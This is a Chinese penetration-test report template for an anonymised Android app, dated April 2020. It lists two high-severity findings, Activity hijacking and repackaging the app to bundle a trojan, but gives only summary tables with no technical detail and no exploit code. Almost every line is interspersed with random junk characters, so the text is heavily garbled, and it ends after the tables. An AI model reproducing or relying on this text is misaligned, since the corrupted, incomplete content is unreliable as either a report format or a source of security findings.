& n# \8 ^6 r; c$ w0 w% ~/ h9 i$ d9 E$ l1 Y
4 x( s" K: d( j$ x2 N
3 `8 X, a V [& b8 d
. p( @) E, L3 S$ U0 ~' l5 U
* k% w# Y' a Y) b- A2 [. B
1 \0 D* @) m1 F5 T1 I" K3 J) i; u
% H, r7 O% @/ ?, t$ Q n2 @
& i# }: |% S9 a) W, W( A% J$ ^! ^# D- P
3 G) I$ C1 |3 A. T% G" l5 J# y, R) B% L3 N& s( e+ `) d! }( v- Q! _8 W
文档编号:
b5 V/ _4 H8 b1 t, m% S4 ?- d" M2 ^, F+ g5 H. `
! D/ H* g4 t* Y1 P1 `
% o" W* l& Q, G, ?; t& M, _8 ]
0 R/ t* N" f) `2 b8 F5 F
% p1 O& I* h. b# p9 z$ N ( o: u+ l3 ] P, f0 f
: b/ P# l0 b9 U4 K
! U- J D. G+ }6 o8 i
9 D }; a! I! b) {5 g% p' u4 y# i# Q 0 Y9 U2 l: |4 }" Z" c! v! p. E2 ^
& Y2 W" m, {& |! P; d3 r1 M' m
: q" s6 {1 P% c
+ ]3 L5 A! R; G8 s% {' `; D3 o, Z
" h- K: w4 }( a7 J+ k) |
1 N4 ` V7 R) r0 \
5 Q9 @& C+ \) C) x2 c+ F' S
" [8 X# z7 _: Y, _$ g5 i* n
- B$ D" ~3 b3 P: M1 |" D% A: `4 h( I! R ^# L) E1 t& {8 h- L
( E' v0 s' V& s1 B
( F( D3 k( ^+ D! u8 F1 e: m# i. z
2 J5 y P9 N9 j& @% h8 }! z6 _$ e. ]
5 v$ b, }5 l5 H3 Y' r1 J9 y( u4 \ K
8 C0 u8 w. b6 F$ S
. G2 q* }& k- t7 E
% A: c6 h3 i+ X' `3 i 8 f6 ]1 l5 e) Y1 J0 d2 d
% h* c& P. x( b7 O, H. v
# ~+ G: Y; r, O8 V+ `0 Y' q/ [& b/ L
+ ], |5 ^& g+ i9 k
4 G. [! k0 D" `0 Q/ d" ]
# ?" |- A7 z! F+ ~0 f 6 y" B. F: K" F: Y
5 K% {- T5 P) Y& ~& b- O. ]2 c
某某某APP渗透测试
3 \' Z' i) m; r4 Q+ h( ^& I
! I0 Q) |! g5 q; j; z8 H- U/ z
- S+ g, x2 V4 J, |4 J4 u4 a5 h( ~8 A" ~( x* m1 A
1 L* w, r1 W$ [( I2 U; ?
7 \4 N( b+ h, @7 S' X7 O. E 5 k- i* l4 j2 I
8 x/ J' F5 L: G- {/ v
" k* `7 s1 @, ]
3 q- { K1 o) y- g% }
; z% a* E. w. m- w
0 Z9 C* e& m$ z+ n, u4 P" y8 E6 S
4 w; r. I/ f9 l6 g1 b; F# n/ f6 |- R* y. o
1 ^5 s! y, Z5 J0 s' y/ y) K {4 U l
0 G4 `; u4 |) X. P* T2 U0 Y
* u" S! \8 n' v% B4 ~
3 r/ ? @% O2 k( @9 F# @+ t. @& l9 Y9 B( [
1 O9 b1 i- c+ Y
* `8 m+ p& B4 N( V5 q
) D% L& u* t( p9 X; n/ i) ]6 m/ Q: G7 k( J0 c+ j% e0 ]( d
: D) c" B% v8 C P4 Z% E
- Y$ C; \4 S6 q6 z: n
: M! E4 {/ q* I; z5 x& g0 X, c/ A2 k- O1 z4 l. \; {+ T& }' }
, ]+ ]2 h, X2 E. T
: i3 Z2 h1 f' ]5 K
技 术 报 告 w. c' B* {) o/ ]4 J
+ y/ p* u2 q; B
9 n& m Q. W9 @7 d1 q% V( b' _8 c1 O8 D- f# W
. k& Y+ `! @5 }7 [1 M. q9 p1 G5 U J. s5 r
8 l: f% d2 E: B- M" V' B ^
% G& C: q( O( g/ x
. O& f5 I+ ]- @ e+ w; l9 ], u& P1 |' Y6 M9 {1 r
( p$ b' c; u9 T$ }; } t p- n4 i$ Q% ?( [4 F! m# f
' t; V4 T" o1 y3 X) l; \
p! d d( D. `
- S+ h, U- i# m% @3 ?$ A5 Y" N2 F: d
. f. m! X- w* `7 c9 j& ]# y9 c+ x: [+ g# A: w$ s- }
0 q/ A/ u/ A" `' h7 k
0 z m6 J' |% }, a# g: H
7 Z- [$ d+ S2 i5 L; h/ {: D. A8 j; M" }
7 F- r p) C6 l5 |6 W; b" e' ~
# Y* e: [" M; E- i
: s0 X& o8 o; w- r8 V' k/ J
1 E2 o8 v1 S! p/ H; x! p6 {, U& ]1 K* v7 i9 ], m; t
, B9 q8 a) Y4 M8 k" g
* C4 t" ]/ L) k! D; A0 ^3 Y
+ z7 D: P7 m! X' \" \$ s3 W
& [( Q& x& ?& B1 k, h
9 g# f* P" t) M/ d+ A
$ r. A X, X) [) x! d
: f: N$ r2 J: Z& `
& d& ?$ L, g. H) `+ I: ]
* W3 ?% E% p7 H) v) |' Y
! Q2 A6 {- a o/ y! c4 f/ y8 F5 a
5 m: S4 b- C1 s" E, w: Q+ B
+ X3 N+ X: Q. B- \. V: @6 K+ f( Q
4 T! B6 [ c2 K! Z# S
9 X6 q# r* b4 V z0 o8 C. G
/ v1 q1 _: ?7 Y5 i" ~: l# S
% [; n2 @$ W N |. t0 W! {. H' J# c$ a
5 e7 Q9 y7 F4 C5 ]" V
: v4 L$ r. \3 Z
5 ^8 H5 r) u$ A7 D* [
+ i9 C+ i5 T. L6 ~9 Q( C) J0 l, x! G# m
; h0 C. d; `* w% F
1 h4 b/ p3 x0 R- l/ u
% k1 R" X3 S3 ^& @7 L
3 A6 F3 F9 J! `3 r0 J u
4 H1 D/ j# d5 ]) X% E
5 |1 h; l8 f) S2 d 9 d4 ^0 `, `' \ l; D' o' h; d8 Q" J. ?
( J' ^9 M) _1 u% f% z- }5 o
/ \# Q# {8 G, q- R6 X+ t4 @* a( }0 v4 ?: }! A, {
& F2 e+ h( Q' E/ Y" C8 X+ V! G
2 B8 C+ o& d }. y, p- y
% t& d% a. V, \) p5 ?
2 x' h" M0 e- Y
/ `" e1 H6 K h, o
$ j* T" a) J) r! l' T, {1 T
1 W1 v, B1 w v3 V' {* F2 ~ {/ _6 }8 o$ m6 G
4 d! W2 W0 F2 R& t5 |) G2 u
5 ?1 \3 A7 B% `6 m5 G% q+ k0 k% |/ o0 g" e
9 G9 S! @9 v1 g, h. g, g+ E G, {
5 m9 R0 V8 t* K
: S3 j% {5 N- n. |* F- k1 n1 Y0 E
3 F' I \& F' E
4 Y8 v% |+ V/ I, {
_' Y) c8 w) O# r; b, B7 V7 N
% }. x+ n, a$ f
, U* K, d# e5 ?- z
, B) F" B D1 u l8 f
7 g7 x4 b3 H3 J# x/ w0 D
3 s- ?; ?+ b5 U) N. w! \( J
5 `$ S6 Z0 p$ j# @- l# a$ V
6 G- i3 x6 P& g4 D: q6 j6 _# F
% X6 }& `1 a2 @) s: u9 N) ~; I 2 Z) L7 y/ @8 a1 @
/ p' w/ p( G8 z2 ^( S3 `
" K; d1 |' U/ ]% ?) R* r' M" _6 O, I, _$ n0 y: F
( i5 `; e4 ^* ]9 H
5 F) h# @! j4 {: {$ Q
2 e$ [7 E* \. G. ?3 {2 j2 f! x7 u- C0 M8 I
. C x) U- ~. A$ E& b
8 y: D* p2 y0 |0 [$ |
; m3 P* n& j' S% u3 b
& F. \$ o+ n- {2 m/ n
6 [. ?- g$ U G, U- c0 |
G7 x) e9 g+ J1 I- }, l
% L7 o- L2 _/ }) |, T5 }! X+ ^
" p8 n9 N9 _4 s
2 x3 _* f i$ H- Q3 i6 X. n9 O6 m
6 _7 N! e$ T5 ^, t, F! m
. }( ]( @6 B$ A, `! v: F9 e" v! j: c* h1 e& n3 J$ ?
8 u- ?/ z9 s) i+ P
- V. C8 Q, M' I: R
4 u, G p& g( V/ d% }2 R% Y
/ }) o2 n) e& S* _ ' o$ i+ R1 y6 J! z( T* z! b
: E' U6 _. m) W3 c; R8 D# y: C0 |
0 N; J9 `) ?) X; M0 `* R
% P* k! ~6 U6 }6 T' P6 K
. ]: O: a! c* G+ l1 m+ M/ t$ K6 b5 {3 A
! z& y. N" @* g( v* y. Y# }5 X# O! l
& P9 N# S3 A9 K! o
/ ]/ F+ H, \8 q3 h5 X 二〇二〇年 6 j+ u9 j: @0 y3 _
/ T6 s! U4 G$ w* P
2 E) k- W/ ^. _' b' |; r* O" l
2 |$ l, j5 W9 {1 y& x; U" q+ Y- W9 [0 F4 S: }; f9 t5 \# j" ?8 O6 ]. E
3 y9 v& V8 J, M% P+ B
3 F$ n- y, F3 [1 Q
6 N7 u$ D+ q5 {2 Z( ?9 w3 u' n$ @% `' @9 W6 k* f
& g% q7 G3 L6 A6 |, y: ]; ]$ V
" X }! w1 U2 U" A
+ R; Y ^( P: F' Y* N, }# S P# `# |) l2 Q, N8 ?1 v
2 q& [; e6 N) I' d+ \* | P7 i+ U) }0 K# H& @4 R
, a+ C4 D) o* F3 f: P
- G; {- n6 z2 j* H% v
; k+ X+ P2 c) ^" c7 `" c
1 t* ]7 Y6 T( q' f! M% J ) G8 I3 h/ z9 U/ }. |# t1 N! n
+ q3 _: J. ^7 y- W" _ r" x* b
目 录 ' ] \" Q, [9 ^' X* O8 B
3 Z" L1 p1 K- Z: G4 a! m5 o, ^
. V% c$ _7 Q+ Y7 I
" V% o% ?6 t, r- f
! L& M; u; t. m, T
. @( j* o/ l/ I8 ?6 N
4 q% G+ f, Y. E! ], O4 h j- m; Y# ?
7 Z+ S2 P* l4 y( ]4 y
, L/ A6 o' J, }" q, z9 |) u
[2 ^0 g1 Z+ L$ O2 Y0 \( y y, _6 z
: U" l4 ]2 e: T; D, H6 E: c+ q( U5 E) v3 {1 O' l
1 概述... 3
; {* W9 ~ F0 ~" O8 M+ C& s7 t/ f! Y: P+ K
* c/ @7 a0 g& l* z
6 x: B+ |7 K& |. K
- l8 g. ]) x X4 _6 e) L/ u2 u# w; O/ o
1.2测试时间... 3 * S6 Q" g) i" t. r* ]4 S' `
; g3 P. S5 t( @$ O
/ r/ k7 m' @+ ~1 m7 E; h/ \0 G) p/ j' |7 m
5 h: X' I9 h7 S# T- J" p0 B; L- J' _$ a# H% V
1.3测试对象... 3 1 J5 s3 U' }$ t) e7 {+ a
7 I9 q0 o6 I# ?& k4 ^# s$ a
+ ^/ D9 i- O+ X9 L* \; d
+ W+ [' {3 ]/ \! k' E6 v }/ S f* G. P+ c% g0 h7 [" L0 t
9 g( P# M$ B- W. h 1.4测试结果... 3
* H/ |( U+ y5 o: C% A
# W4 H% D! I/ c- |, l4 u$ {8 F$ a
# { @. Y+ d0 E g" @& Q% x7 k1 V7 U. p
7 P% g( Q6 X. }& l
8 [' ?$ W* p+ M( O 2 检测结果... 4 ! T3 K9 b! @* p5 K, c) r& f
8 r0 y" G3 Z5 l# F: Q P# B3 q8 ?/ ~
. X+ |; e, C/ |: h$ T/ F
( b: p5 m0 k0 M$ p
9 s% m( D2 F% u
/ Y- d( m) L7 B- L0 Q 2.1 某某某... 4
% t* i( z2 v9 S- S! B) {; u( X' D1 ?' Q
! d* }- i: d9 q. N2 |' b4 n R( s+ H+ c6 q
- i+ J( r2 y. ^! l$ Y7 d# _
+ k9 F( D: |/ u- M6 D$ z
2.1.1检测目标... 4 7 s! O* _5 K9 k1 |2 j
0 u c u! x8 d8 `! q
/ Y; g/ r1 {0 Z: k- I# ]# `% M1 N F# Y7 }
. J& C0 h J, X& f$ T& D$ |
% k8 S7 i$ G3 F( p( p. l 2.1.2检测结果... 4
6 e$ ^% D/ v: U5 G7 b: t4 P ?3 q& `% [3 ?! `& w. w0 ]. h1 i
_& ]1 Z( d/ F* n
1 v9 n% ?* t. S- w& D
1 ~% r( L, w- K. o Q. c' K
3 _- j4 i: q! ? N2 X8 c. Z 2.1.2.1. 4 / g$ {$ I$ V' g! R: O4 l r4 h
3 y- H5 v" `+ M J; L
2 {$ |' c" ?, b- O. i0 C4 T# P4 A* V7 R4 L# O# k% Z/ V9 `# _! u
: A. k4 R6 m9 A0 `1 p# h
! F X z8 X% a! ? 2.1.2.2. 6
0 r+ _) [/ U- q$ C- C8 V
/ J7 P8 j) D, C) Z9 j8 q" s
& A3 K! i/ E$ Q7 B; W8 J; [+ T
! D. ^# ]6 l$ j6 G1 v4 [9 v$ M 5 Q) }' {" i% z1 S( R, G
7 x# b6 x! s6 j9 w, D a. {0 a1 |
: v0 ` G! ^' K6 T
) r) |2 W5 `# ?3 Y4 z6 B! e
1 q. i: p" z3 M) J- Y- A6 U7 m" Y( \6 e: \8 Z
; t4 q' j# k+ K; @9 \3 B: T
' K( l1 w+ | x, ]2 l. ~ ) O# ^8 u( X) `) O
; g7 j3 Y4 l4 d- d* E% _* t& w; s
# ?5 W- w' Z0 X; p) G% i2 ^9 N& o! X8 [* R- {3 l
7 ` \% F, m& n. i1 ?7 I( ]
) w. A2 R3 ^& r1 a: G% S ) t( q: A+ V. j" O
2 j; k: h: ?9 g4 B2 V
1 概述 $ w% x3 I( F* V- h
% g4 G# E J; i( u! L7 C3 B
1 ^" e, u" l1 W! Q d/ E9 k% c
5 y/ y6 |% A) {6 N, d0 N+ }
$ s, p! E3 ~* j% r
- m* H: {$ r, E; h 1.2测试时间
6 {; ]/ U# z* W) @3 ^; p* G% ~4 G6 A( W7 h# T. m$ d- Y
, X, ]4 a2 m* T8 M8 Z
* S8 N5 Z9 a* q- {+ z- z/ j3 [
% K2 S0 O* F/ m! Z4 E2 I! W* c8 R. O. K
7 \3 b( D6 D3 k4 |( b9 z- K5 y$ ]" Y9 X; a5 i; J
2 L# w- x+ a; ]8 _( R
: [1 f0 ]: m6 k3 B" P' F g
" n6 ?8 f6 d. t2 F/ ~4 M5 m; t( W/ ?
' k8 z. {8 Q) o 9 M% w9 I" R& R" ^- Y
2 B5 C" K9 O. R 渗透测试时间
* H/ M2 {* Z) P: Y+ h: p
1 E% |# M- Z4 A4 Y. u ) N9 w7 N8 }% }
6 @' t; }! ^! h5 _ |
7 O6 W# T& O2 c1 F/ l: Y" H% t: L, }+ u1 c' }
9 A5 s6 L) a0 `/ z0 ^4 |6 w& Q6 Q: q9 U* c
) E) D8 }0 G+ C
' V+ r1 U; l' X' k
( K3 L ^ S0 m8 E8 f( w- G) F
: V6 k5 s0 h% U& x( t& V! {
- _+ z* E5 m% V
! P3 `- d% }& `4 C3 n" X' |- _! J 起始时间
" }& N# L4 E4 F! E& U; \6 Q8 r. i {+ A, B# \0 d- `
2 k- D9 q& A' n0 h3 t4 y+ L
+ Z6 i$ G/ g7 O( q" {$ m+ p1 m. F |
, \+ B3 {" b( \, V) A0 \3 y" ~3 F- U7 V, R+ y& p
) B# y [1 W8 v! |8 _8 r$ V* F. ~2 O: _9 Q
0 ?! N' A. Z, s: I6 ^4 Z
) w, ^$ S! ]3 R! X$ {7 B 2020年4月6日 1 R( Z) o6 w2 w4 ~& |5 ^
% j3 z, d/ w! E 0 W0 k; f- z" w0 j4 ]0 ?+ u
' v4 T1 m( x' q3 e9 i
|
5 c6 q: e* G1 P& |8 ~& w4 d9 r8 K
. P1 R/ z2 a7 o, N B7 l
+ I3 |& R3 g x4 a/ l
& j& u0 U, x7 B- m0 L8 I4 P9 S4 I& k7 Z' K5 P" w% [
1 l8 K m! [6 W7 n3 c8 e/ x+ K* J" m" |' Y/ o7 ~. b
, D1 L s1 H. m+ b* A: c; W
2 v4 ^9 f) a! q; k4 Z2 t- \ 结束时间 - O# a& @- u; c& ]4 ]
7 q: Q' J9 o/ N1 J ; C7 Y% P9 n0 k6 c+ e4 r
) e, y. B. c: n
| , P8 }) D+ x# y, A
9 Z7 F; |8 Z* v% G3 h0 g; W) A i - O- T y0 j+ S' k
, w7 k- W5 ^7 G2 c! ?
6 }1 q% s C$ q8 L3 y1 E+ C
( O5 e4 j0 [4 b% y- p 2020年4月9日 5 A( O8 ~" ~; O, g
" M% C) e# L3 J: }% t# s# V
6 I. S' ^# o& _: {4 }/ L5 f
8 J0 @1 v l( ~; L0 q/ J5 w |
. l5 V" l" |& V. D. `3 i, v
0 H1 W# A$ Y4 v$ n5 |* d
' B3 r6 q2 z% g6 X5 F
. A) R4 p5 Y# G7 X, }- F" E! I
% O8 ~* J" v# M9 y& N4 I- ^! f! u
' t j1 P* |- N s* U( V' }$ C: p
i; {2 [+ |+ _& O0 C( W
+ }6 ?8 G+ A. s( _8 W. Y9 G& w Y9 N" o
1.3测试对象 6 \! ~$ e# X- a& K* q" `
* v# W i& V" N
5 m0 D5 Q& @( x: ?
) K- n6 L F9 Z7 u
) h" r) y* _2 [4 p
! P& r D; y( n$ E 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: , J2 H% @! m. L5 Y$ g. c0 B) `
2 [: [& t$ S/ {! ^ I3 I" X
1 O$ p# s, ?- h, y" Z
' x( g) Z( C5 z 2 P9 H# E! k# i3 Z; W
- E" [- \7 }* I8 U( y
表1-1 检测对象 " \6 C: B Z/ v
: @5 `' l. W5 ]( l7 V; x
5 L7 ?& n" ^$ z9 U( j( N* ^* T& G& P; [. |
# e5 y, _2 ~& A( R4 Q" q( }
3 G& \) Q: { f7 o . p! W( N! C1 W! H5 i5 @6 V
& m! O3 U7 z1 F a( } - D9 T3 ?6 r- n) u& A! ^
! n9 a# N" b$ {* L5 G + ~, {7 ~# P, H" w4 y) |' ^" i0 F
3 n: p. Z0 f3 T7 G" F( j
' |5 r4 p9 T0 {" o
4 z# @! o6 s7 I, ? 序号 % l- A% ?( H: L# U
) y" D W4 `+ |7 t; n
! v$ u# @9 z" q; w" X( o/ a- j) W1 {- p m* K4 v
|
0 ~! i' E& _' u. F2 r2 k! m# b& E1 R, a% C2 i
* l% [- C5 q7 Y% X
: A9 m! y4 P# m6 Z' v8 }
, q4 |/ ]( J0 h& _" x4 M: I& ?/ a" C% D4 A
测试对象 # H7 _+ G9 D s# D7 n8 Q
, {8 m0 }9 D& k7 i. v2 f
$ A$ L* v1 d* S" s b7 i5 L( a+ T+ s2 I, R9 ?" n
| ! [1 N7 {9 n/ [
4 H N; `! t* r P0 v; K7 Y
# r; [* L" J$ Y" o3 N+ T* P& |7 @( E1 `) y. [( t
2 }) `5 @( |% P3 o6 N
5 g) \3 q; i+ f8 b8 a 测试地址 & f% C7 U9 Y9 a o8 n2 |* V3 _
( O: @. G I+ Y
' D/ U& H3 \0 }0 p) G& O7 `. O. M4 l5 x2 D& t z# `2 t
| , `6 I- n3 I; y2 i4 J! u* L
4 }( A$ J! Z: `/ r9 r/ m
1 T) r2 F# n2 `( D3 N# f
( \2 z9 }* [- x5 f8 A0 H" D- w
9 R# U4 U( r* o1 d3 j/ l5 k4 @2 }5 W2 r) P3 W c
安全漏洞
; c0 ?5 J# K" _# \: R
: I. M# D4 E G6 h
' p6 [; c2 i3 v
7 s+ ^' C' N# N' d `+ U/ ] |
" ~% a& V4 T9 w* N
| ~$ Z! O! I; w# D) ~) c) P
! Y$ M9 @8 { P& {4 g2 c3 }
4 Z: K7 Q( s: ?! G, E( \9 J# a
$ Z( u9 y+ s1 ?6 |* K; ~- D$ u! s* j b% o6 }
" [" m( t) d) S5 P: c
3 z7 H, y0 i; Y( |" n
" f2 |) L# }' V0 H% a
5 {6 o% L6 r+ J' k/ |. b
1
* ^2 m1 O+ j8 s% ^( P( ~! s. i( N% F5 N m% m2 V. N; U
' X5 h. m- i+ p4 g
5 U' R+ A1 S- c- y- Q, z: [ | " k- M/ |1 L9 O( x
/ T! E: O! s0 s* x+ |: T' c
, Y( z+ ^% O' r( \# B
* a5 s# E( x3 m7 t: G! @* V( W
Q# K1 o4 K( O5 T4 s$ H+ L# b" D6 @. @5 e B
某某某安卓APP $ h7 C! t7 p, C+ D
# ?7 ~ g& {; L% L; D I- D
( f, I- k0 O* @
- R: S7 w, y2 |: M$ s0 v" }! A, Y |
* n& g# u7 T5 f3 j U
6 c4 ~6 q- ? A$ L4 e4 _
* T [& h4 `& G! M* O, W: A& L/ E+ U- H( f
0 u Q) b4 D; H, l
9 w5 Z- V( x; k8 e# {8 I
, q& b2 v, P5 }6 \7 p" O5 U( _! W" q( c k- r, Y
* N, A F6 |/ M3 U0 u
9 ^3 S5 }; W( _; a0 r5 {0 a/ \ | 6 d9 C# J1 P3 ~" J6 ?5 c
0 f5 t. n! Z2 L3 l5 x' ^* E : h2 \2 `% _) p
; k' {! j4 y; Y7 W
& j7 b' j3 s1 R! H7 u9 E) ^
7 W7 d @6 F" v 2
( \' f) j$ ]6 ?: |
9 s, [& a- q- l# R
4 G& g; I7 H3 i L( a4 S% r/ M+ x! R+ {9 c& r' J! ]# W' u4 W6 N) [
| & e$ n; c: v9 `; a
9 V. ]' T9 T; N
) B3 E9 @9 g' E' b. p) D+ g
/ P; @0 D) ` l
8 G, n/ [( r" z. g, ]5 m4 h0 ]
- D6 p. V& t( d
7 W, k3 n5 v1 j, X1 U$ K
4 z0 w1 l! M# {8 t1 a3 {' j ) @9 A4 n5 O! H! {) S& f
+ i/ E, A$ d% G) h' a8 a
1.4测试结果 [- s8 J' ]% s" [" D
4 G, ^. J: `- H0 I9 m
1 I. x; w9 v, K1 f( z5 I8 o" J
( X; s$ }- B9 }$ W$ e
6 Z" s+ V! A# e/ ^* L" z8 ]+ F$ |% d
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: # x; F! D6 C9 }, B# x" g q! Y- k3 ?, G
9 t/ e0 ]8 ]6 d6 d$ O r
6 w# R/ M* ~! \% r8 ]& f8 @8 O" O) G/ W
) ]1 X8 L& ~" p% t; M# f
& ?) |/ c5 O1 Y
. k7 {. `5 z+ S! x' M
4 Q/ @2 D7 H8 R' T J- b1 n
+ T# j5 [: b$ w0 S
' e0 b0 {3 Z# h7 W4 v0 \( {, u 8 S& Z2 T0 i- U! u
] \2 ?( l& O9 p, c- y
7 v- h. k H5 Q/ O2 {; B
7 T/ L& k5 [' i' R% i
5 n- s7 I& z! [3 J, c& D s
; h& Y9 Z+ w" P. @
9 F$ i2 @" U. m; r5 w z$ m( u9 N4 \6 x
( D! Q( P% a* C) k: ^
5 B: y7 X( p1 n) u# X+ y6 y 6 E' m+ q8 u2 T! k
/ }0 Y; x: |0 n
序号 5 m4 e) n7 N& P0 F
! l: F( O4 j( s! ]% D* g/ l ( P3 v s# B4 C' o/ |, Z$ i1 W
) h8 V2 N9 n" C% O
| ( C3 O2 R+ P& O6 D5 u% J; e
3 G) o" a- @* v: F9 A8 B1 b
: t# `4 Q2 p# W) Z# v- ^
1 \3 J/ @' V3 L, z
4 T2 O# o/ r2 D1 W; d: A1 w* q
+ g2 f1 I7 ]3 T( S; K: k 系统名称
; W) @7 ^) G: g2 j7 m
: d7 p% Y3 b% S, A9 J9 ~- { B3 Z* s# }: o T0 M
/ C; U% k: e& k( |7 j( C2 w8 z
| % K1 U2 m+ ^- s; g" p
9 T& g- {4 b, `. X
+ X+ m8 t; Q" {
& J- n* y6 z. k
% B! m8 L4 e, ~% A
; u4 D/ E0 }# v 漏洞名称
" j9 `* Y4 t3 b% _8 W
1 `7 {* D* j8 V4 _0 G
: E& G. s6 S- D' I' n, J/ i( C; B
u& S6 I& h0 A1 o" l, p% v4 j | 6 o2 y7 }" P. k8 H
: B" S, ^6 R8 A3 g4 ? % @+ F3 S0 M3 R
+ U/ ^4 k" R& E* A0 a 4 B6 ^) W8 @) C* w" Y! |8 x
. r* H5 E. z# X x- [
漏洞危害
9 u, v) |1 W4 D* ?
7 |( H' t' \. L5 ` O. Y) }
C4 V. z8 c5 X c& _: c! f! f ~, s0 j0 H& [- b. E
|
7 u8 ? U) a" `7 H/ I8 b' q0 N" N$ U# d6 m, ` G- {( `; |* u b/ B+ m
( w; e y7 p) j8 b- g4 m* f
9 B0 b6 Y: n6 U' F5 u) `
0 y. w0 K ^# r6 I* e {9 F3 _( t9 K& l6 ^; m; |9 V
修复结果 ) p& m4 \! r: r/ m2 ^6 X
$ }1 f: I# P7 |- `( U9 q
" c i5 b, h; l1 F+ T, c
1 L( w, P- q$ Q$ W1 e3 L | 8 n! }: A- W$ j5 R: L% S
6 p$ E( |0 ^/ Y' h! k( l4 L' X; b
7 {7 P0 _4 M+ |, b+ g9 b
6 G. d, [' k8 n
! j$ B: e& @; R( ]( r6 R
1 @* T3 Q! J+ t8 r8 { # C- y, T3 f* R# O; f
% u c% d9 O5 F: z S( F
$ w" N, u8 s4 u% Z2 F
5 H* C. t3 {' T& G8 z 1 $ X0 h5 Q: }/ J0 s) [/ A
- P6 }3 I/ I5 l2 q. f9 v
( S: o1 Y/ [) F8 X ~2 A
2 b5 c& y9 ?8 D: S6 [
| ! i" p O: G( ]9 O3 D+ U, F& n- A
) @$ K8 m4 k' F& k
' u9 d! N. [7 g- K2 {2 {( c/ ]
7 z7 p. M6 T" C! K: q! Q 6 _3 }) _2 Q: V, |
, I8 \- c; Y S 某某某某某某APP
2 Y9 O' H& `. g/ p! }, I5 T" W2 X5 ^' Q# z# }: h& m
2 S* z* L6 W. M' Z: [2 H4 v4 R! u4 V
|
9 A$ L$ U1 |. w. \: x7 z5 A0 \. A4 G
3 m* |. j0 M. I7 m$ [
( j) Y& E" f$ b5 G5 w5 h; {
. D; c. y4 Y0 I( x9 ^+ M- N, _- g5 f6 O, G$ S
Activity 劫持 8 ~$ k; X2 J+ A& u
5 p+ C1 a+ F4 Z7 U # b& t0 c4 E* m2 m h- e
: H" C' t* \0 } G R& M
% x/ _' S2 S i
+ F* ?3 ^5 I) b/ q
4 C$ v% ^" Q. B4 b7 e
$ W) X8 m+ a+ t6 S) d ) G% Q6 p( m% \4 w, l X
2 t! p f, z% b8 p0 [2 y8 @ | * }3 p6 Y/ B5 z3 o8 F
$ s* G: Y1 a3 ]! `
& [9 E9 @+ t) R4 t2 R
4 i( M$ ?* h, Q0 ?+ ~( B ; c7 |/ D+ P# W5 J d
* f- f" l7 W6 E$ u5 F1 ^
高
: t! ~$ k, w7 S+ D5 \& d9 X% S* y" `: d
# d9 X" L/ x, I1 }: u, Z' L) p- m
& v$ q/ M) V- V | , A3 p/ V* ~% `
/ F$ N. J `1 F: ?' y- u" }! K+ D" Z
5 T t. x; `4 |1 H6 U4 }7 f$ Y: s9 a) ?
( l! s1 y$ ] A9 P% y " O" l# G% S: {: S! A b2 q% ~
- i- ]: {& r& {! G9 \) j% t2 S! H* {
! c+ A2 q/ p( |$ N) Q: w
/ s! _' t9 y- _5 E
/ o! s [9 A7 c8 Q( M
8 @5 |; l' v" P | 7 m4 P/ I4 x; |; H3 F/ c) q! W
9 C+ M) M0 Q h4 a- i( }. L
8 X3 R% h) q/ g# z7 n" R& Q" I" n" i
( F5 j( V: ^/ m8 b
8 b e2 x0 y0 P" b7 W
H7 H: _, y' a( ]& T i9 O
, _4 |, I" ]( [1 N( ~: X* I
; o0 z4 u% H+ S% Q) I$ v8 X; ]9 m
9 ?0 o$ z; a- O& V0 y" n l" c3 R5 L) `8 y1 {5 R
2 / ~9 z5 e% y7 F- N E1 B9 ^$ C
3 b& @+ @3 a+ \4 Q+ E
2 q; z: |% p4 w5 ~4 c) R; _6 D& B+ j
& y i' x0 ]# H/ T | $ T! R3 _4 h# Z9 O$ F s
! [& z) s# A- a# [8 g8 B. t# \
r" L8 c7 N& r( p. P0 p+ W, i c5 V) M% e
5 ~) ]+ N% q! W3 N# z
/ R0 v) Q k. `! y9 `" t3 v
某某某某某某APP : c( M5 ?, |: W* b6 m9 i) v
( c5 c5 {2 ~" S4 n7 |, @ ' f2 W1 d/ Y1 l9 z
6 ?9 C- `3 B4 ]& b# V3 F | 5 O b8 B7 R1 X# ^1 d" _9 C
# S( o- Q; E( D$ b2 z7 K. x
( t$ `. b& t+ j
$ `" _2 T$ j& ?7 F- ? 7 N! `2 @! u$ l5 u1 I& Y0 Y5 ?% |0 T
( w t( ]% K" v* C% y6 l 反编译二次打包捆绑木马、篡改APP代码
; X) i2 j6 |4 }* m, N+ O. c u/ V, g8 n' U
0 q9 }9 G$ B: O" o4 }# Z1 _* v% T
9 x% m1 ?# y# Q2 J& }1 T+ A |
- T) S7 n x; I/ U0 p N4 w) |' G3 e( x$ j
8 n1 n, ?, u+ B8 H
; e/ A; U9 K5 w5 ~
1 m+ u4 c% X% v/ d( v$ \
) o6 X7 _+ K7 A; R 高 9 j1 Y$ o- A& d+ A, f
4 P% o- p0 G; g/ S: c/ D4 _' q6 I- I ) F+ p+ Q" e5 D4 k9 ^* ?
7 O! V. L. B8 i, Y( p | + \7 o$ S& l+ T9 [
; _9 v3 o2 |. v0 N R. T
$ ~& O9 k' T4 t4 R9 p( ^
8 i0 _% C( N* D0 \0 T( M& v - d: i: D8 N9 N% \* d" j- i) D
6 y. e. r1 v8 F1 ]4 | L5 Y
0 R0 P& E1 A* @% e/ `) l
& ?; O+ w# H9 K4 ^& @- t: h8 O/ \
6 P) L( H" s& L2 ^% s4 q
1 ? {8 f* N$ y5 ]+ Y |
+ E/ S [! D7 x1 J( |
+ n$ S+ z2 n9 `; u4 t( N) ?1 R& S
6 y3 q J* a; x" G
. b) E7 n- J- B4 c! h1 j) H
1 ^8 e. P" B1 P2 ~
6 H, Q9 n/ I# n; o' m; e. s
( v' R6 t5 p4 K2 M5 L1 w5 ?% e' y; |; g
4 [0 N- Y. V' v2 l( B) Q% P: `( @
9 e- q6 v Z' H2 Z& ]+ A$ V. U. u/ }
* L" D, R) l% r. Z) ~' J: u o; S; x
: C/ w0 D) Q0 Q( a& `2 y
9 E: n& a1 c: B
+ j/ I7 i' z- ~
. F+ S# j7 n8 o
8 T, N# k$ ~( ?& Y% W4 ~4 X% {6 M" o
, I7 F* Y4 v* y" s T( a5 H 表1-2 测试结果
, }8 x0 z0 J8 M2 B3 {- f) k I+ D1 N: \4 {& z+ _& {! ~
% k4 G; {* e$ s8 M7 G3 }# T! i
0 P- }$ a1 W! Z& \
; F* g& ?/ ~) c3 Y5 t/ j3 b; ?8 x: a* K" ^9 S% ]
